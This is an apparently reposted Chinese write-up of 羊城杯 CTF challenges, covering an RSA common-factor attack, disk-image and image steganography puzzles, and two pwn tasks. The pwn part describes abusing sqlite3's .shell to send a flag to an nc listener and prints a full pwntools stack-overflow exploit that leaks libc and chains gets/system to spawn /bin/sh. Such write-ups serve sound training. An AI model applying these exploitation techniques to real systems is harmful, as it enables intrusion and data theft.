羊城杯CTF 题目wp

admin

102243
文章

87
评论

2022年9月5日21:29:55评论195 views字数 8907阅读29分41秒阅读模式

本文来自“白帽子社区知识星球”

更多红队题材或其他技术内容可见知识星球“红队专栏

羊城杯CTF 题目wp

Crypto

easyrsa

题目

from flag import flagfrom Crypto.Util.number import *
m = bytes_to_long(flag)e = 65537f = open("output.txt", "r")a = f.readlines()for i in a:    n = int(i)    c = pow(m, e, n)    m = cprint 'c = %s' % (m)f.close()
'''c = 38127524839835864306737280818907796566475979451567460500065967565655632622992572530918601432256137666695102199970580936307755091109351218835095309766358063857260088937006810056236871014903809290530667071255731805071115169201705265663551734892827553733293929057918850738362888383312352624299108382366714432727'''

分析

1、output文件中的数做为n参与计算，计算结果作为下次计算的c。

2、观察output文件中的数，通过计算，得到了公约数p。这样就可以分解出q。从而计算出c。

解题

import gmpy2from Crypto.Util.number import *a = 65439077968397540989065489337415940784529269429684649365065378651353483030304843439003949649543376311871845618819107350646437252980144978447924976470943930075812834237368425374578215977641265884859875440799334807607478705932175148673160353577875890074101393042506714001617338265284910381849259298772642190619b = 86843235426823545017422014398916780909062053456790256392304973548517489132984667679637386416948409930796162377844525829968317585749956057149930523547463230147376192820753802868362225137830225967953826475779047454555958271846035526319036389127587352017149417549187850782892924691511398536178090031958365483499c = 57839320383142814687522363258949714784622321678585619281948174372461045134361003939684803510572969567182690634502610963365500727981041136988638273942465134797850643121827808482673619534240872593224537996099454035648829692386918230535360101064254854063175494150147494342652670585674593236663514793256521719547d = 52668168898129361356420333177679019946307853075463961068071790653159090226904625885080236174231665178538405547828768043706515464922611051221394704678558922339886480247663138702481349098077291584992082414494275463670330534613607852999291645500391111597009868188974671249118213040057429113174377610094956993269e = 79875848044631194160351918105738804229446748736206976033243436373010695259945613104837645712048695514204494137005015770637421510392760763371639480133851920449252506525423837434811693638210458851990502785655738042348115385964604080872180121543147063180945532713593712726527002909054818485584237993215139630243f = 73100501797447180147684637554796375398455002202770022931512541062214916136294604754404667725341796896161398464327153718845280194035978972665664657052946003418121755545770123205426883869361411412259838522099085901563107814985172942977520233320215882707710717870398128412272218474014381169303848087621856187879g = 89149546555397759430343098936690138982544367561661914051499112345535238108800665531588376806546499374457634397161670140520060064963391826220177798442707381640723248034061313974522233415815795656570220902974484865176728535660627712374835329967608728216749734529761431592345816592875807318876347151421393671763h = 66449107450661172442868032153863675098235855689218695279414435182923510356012957155941548483160873271040452368644926703812707864779900715051152673705082002761445847561495295455460041902473282731259268870375921215589157288622757488879539441498396276257589120302991242300378364101246448094955634459779361686643i = 79694880331320743031437708811856697413105291652061062223857313580221562305807771003185061831752133665835648647560103986928466217390444724672894866216636981793418219455653595717274553950715056120806463449033181486699963584346517910081706586345546292894426402568226579894766693070066214488743160957135286739213j = 70521001788476157145543175674209083194325853388116385624440232036679708917857095748070597575068955423165296665429648694541353249787337464272095260410717659726012806836884799476995758902361678737968193674368688353935424186389207123637734230550266810766585903134004322848985320790788169777840924595645463787189k = 51801430118171456966246071852561156183140136541960623661080056673664466785669585092926482194691254461430866302262960624015915371927788809661387318097968209364907625599562339722700041444342116899266802018340155635959614677597708758012024981583143521259152639480003228924151971208695043251548758407218187895663l = 87310111118839703578797261862424304499548882114635944516216618095145194843718635007052242072452831460162126955481326379219639313067967998826898344673513019946299427614605216960081461930080199023399060417820769438661351988322185620598552697590115678078498754112860310272842870106790357443602405008865116282919
print(gmpy2.gcd(a,b,c,d,e,f,g,h,i,j,k,l))
e = 65537
def slov(n,c):    p = 7552850543392291177573335134779451826968284497191536051874894984844023350777357739533061306212635723884437778881981836095720474943879388731913801454095897    q = n//p    phi = gmpy2.mul((p-1),(q-1))    d = gmpy2.invert(e,phi)    m = gmpy2.powmod(c,d,n)    return mtmp = []with open ('output.txt','r') as f1:    for i in f1:        tmp.append(i)tmp = tmp[::-1]

c = 38127524839835864306737280818907796566475979451567460500065967565655632622992572530918601432256137666695102199970580936307755091109351218835095309766358063857260088937006810056236871014903809290530667071255731805071115169201705265663551734892827553733293929057918850738362888383312352624299108382366714432727for i in tmp:    c = slov(int(i),c)print(long_to_bytes(c))

结果

7552850543392291177573335134779451826968284497191536051874894984844023350777357739533061306212635723884437778881981836095720474943879388731913801454095897b'GWHT{gixkJl7SJTcpLOL9zqwo}'

Misc

迷失幻境

通过DiskGenius加载附件，可以看到在迷失幻境目录下有好多图片，全部提取出来。

羊城杯CTF 题目wp

发现数字命名的图片全都一样

羊城杯CTF 题目wp

在附件vmdk镜像里的回收站中发现了一些文件

羊城杯CTF 题目wp

将其提出来。

其中$RE4UUGI.jpg发现与迷失幻境目录里的哒哒哒.jpg显示的内容一样。用Stegsolve查看，发现$RE4UUGI.jpg存在隐写。

羊城杯CTF 题目wp

用010editor查看$RJ3JGVF，发现为png文件的主体部分，缺少了文件头。

羊城杯CTF 题目wp

补齐文件头，得到一张和幻境一样的图片。

使用Stegsolve查看，发现key。

羊城杯CTF 题目wp

再使用outguess分解$RE4UUGI.jpg。就可以得到flag文件了

羊城杯CTF 题目wp

where_is_secret

打开附件，发现一个压缩包和一个文本。

打开文本：

Naseu bybkjkl, O wt mna Wkkopwkja hl Qrkgeux Fasxtorr. Zdl Kaozbgj hksu oty fblz hhntyoxj wu tzphvq ku Nqnhbta, hgj pox Qupo geyiuna ago ixkj jhtpyhrhlw hu aak Nblyehg gntr. Nahkj pvwgu pl QBJ Vxwgr Zdbkyzhr, O jlxj ovfkkux zk ikojn fk 29.94 bpgmay-layrbtc vkocpggh jaoyrxt wz kgpphto uhc. Soxt E yxvas mna Ynyoptt wyfe, E dbrh pgbeax ekb mu yvfk pv Nqnhbta ah ha aak rpvk lyxyekxtp.aak lhlysvkj ez ZCDA@K1tz0frjo

推算为维基尼亚加密，使用在线工具爆破：

羊城杯CTF 题目wp

得到password：GWHT@R1nd0yyds

解压出来后是一张图片

羊城杯CTF 题目wp

根据官方提示，

from PIL import Imageimport math

def encode(text):    str_len = len(text)    width = math.ceil(str_len ** 0.5)    im = Image.new("RGB", (width, width), 0x0)
    x, y = 0, 0    for i in text:        index = ord(i)        rgb = (0, (index & 0xFF00) >> 8, index & 0xFF)        im.putpixel((x, y), rgb)        if x == width - 1:            x = 0            y += 1        else:            x += 1    return im

if __name__ == '__main__':    with open("829962.txt", encoding="gbk") as f:        all_text = f.read()
        im = encode(all_text)        im.save("out.bmp")

逆向脚本，注意各颜色通道数值的位置，得到一篇文章。

import string
from PIL import Imageimport mathfrom Crypto.Util.number import *
im = Image.open('out.bmp')width = im.size[0]r = ''for y in range(width):    for x in range(width):        t = im.getpixel((x,y))        m = (t[1] << 8) + t[2]        r += (chr(m))print(r)for i in range(len(r)):    if r[i] in string.ascii_letters + '0123456789{-_}':        print(r[i], end='')    else:        print(' ', end='')

羊城杯CTF 题目wp

发现里面存在了一些英文字母

羊城杯CTF 题目wp

自己拼接下，得到了flag

flag{h1d3_1n_th3_p1ctur3}

PWN

YCBSQL-v4

拿到题目后，把sqlite3文件丢到IDA里面

1.判断环境变量

羊城杯CTF 题目wp

2.然后做了一些初始化的检查

羊城杯CTF 题目wp

然后就是一些循环看我们输入的参数，然后执行一些操作

本地运行的时候输入 .help 可以查看到命令帮助

羊城杯CTF 题目wp

可以看到下面有个 .shell 似乎可以执行命令

羊城杯CTF 题目wp

所以想到在 .sql 文件中输入

羊城杯CTF 题目wp

然后服务器用 nc 监听

羊城杯CTF 题目wp

可以看到flag被成功发送过来了

FakeNoOutput-v2

拿到题目后把fakeNoOutput丢到IDA

程序实现了一个简单的http解析

羊城杯CTF 题目wp

程序首先初始化，然后给s都写上0

使用fgets输入到s中，输入失败调用 response函数，并传入400

羊城杯CTF 题目wp

Responce函数就是http的相应体

羊城杯CTF 题目wp

Init函数设置缓冲区，然后给s2写上0x110个0，然后，在里面写上随机值

后面就是对相关http协议的字段对相应变量设置

羊城杯CTF 题目wp

这里如果sub_80497C4函数返回真就会进入 sub_8049E63 函数

羊城杯CTF 题目wp

我们看该函数的upload函数

羊城杯CTF 题目wp

这里strcpy向栈上拷贝数据，而且haystack是我们可控的，会存在栈溢出，注意strcpy的00截断

前面有个 while 循环，只要我们跳出那个循环走到下面，就可以到strcpy函数，所以我们在content 里面加一个 filename=

羊城杯CTF 题目wp

前面的content-length可以给size赋值

羊城杯CTF 题目wp

Responce 200 的地方可以传个地址进去泄露libc

from pwn import *from time import sleep
context.terminal = ['tmux','splitw','-h']context.log_level = 'debug'
# libc = ELF("./libc.so.6")sh = process('./fakeNoOutput')# sh = remote('tcp.dasc.buuoj.cn', 27898)elf = ELF('./fakeNoOutput')libc = elf.libc
ru = lambda x,drop = False : sh.recvuntil(x, drop)sn = lambda x : sh.send(x)rl = lambda : sh.recvline()sl = lambda x : sh.sendline(x)rv = lambda x : sh.recv(x)sa = lambda a,b : sh.sendafter(a,b)sla = lambda a,b : sh.sendlineafter(a,b)
strspn_got = elf.got["__libc_start_main"]res200 = 0x080496A1main_addr = 0x80492e0bss = 0x0805D3C0
payload0 = b"""get /upload headHTTP_SERVER1_token:taaaaUser-Agent:tccccCookie:tddddReferer:teeeeContent-Length:t5600rnContent:filename="""
payload0 += b'a' * 600
gdb.attach(sh, 'b *0x8049FEC')pause()
sl(payload0)
payload = b"A" * 4164 + p32(res200)payload += p32(main_addr)payload += p32(strspn_got)payload = payload.ljust((5000-18), b"B")sn(payload)res = ru("xf7")libc_start_main = u32(res[-4:])
log.info("----------------------" + hex(libc_start_main))
libcbase = libc_start_main - libc.sym["__libc_start_main"]system_libc = libcbase + libc.sym["system"]gets_libc = libcbase + libc.sym["gets"]log.info("----------------------" + hex(libcbase))log.info("----------------------" + hex(gets_libc))
sl(payload0)
payload = b"A" * 4164 + p32(gets_libc)payload += p32(0x08049539)payload += p32(bss)payload += p32(system_libc)payload += p32(0xbeefbeef)payload += p32(bss)payload = payload.ljust((5000-18), b"B")sn(payload)
sleep(5)sl("/bin/shx00")sh.interactive()

如果觉得本文不错的话，欢迎加入知识星球，星球内部设立了多个技术版块，目前涵盖“WEB安全”、“内网渗透”、“CTF技术区”、“漏洞分析”、“工具分享”五大类，还可以与嘉宾大佬们接触，在线答疑、互相探讨。

▼扫码关注白帽子社区公众号&加入知识星球▼

原文始发于微信公众号（白帽子社区）：羊城杯CTF 题目wp

左青龙
微信扫一扫

右白虎
微信扫一扫

羊城杯CTF 题目wp

BUUCTF-zip（CRC碰撞脚本、RAR文件尾）

CTF-zip解密-crc32暴破

原创 | GDA CTF应用方向：牛刀小试ONE

第二届华为杯 WP

看雪2023 KCTF年度赛 | 第12题·深入内核-设计思路及解析

『CTF』堆入门（三）

腾讯游戏安全大赛2024决赛题解

首届“数信杯”数据安全大赛-西部赛区 WP

看雪2023 KCTF年度赛 | 第13题·共存之道-设计思路及解析

第一届龙信杯电子数据取证竞赛Writeup

发表评论

在线咨询

微信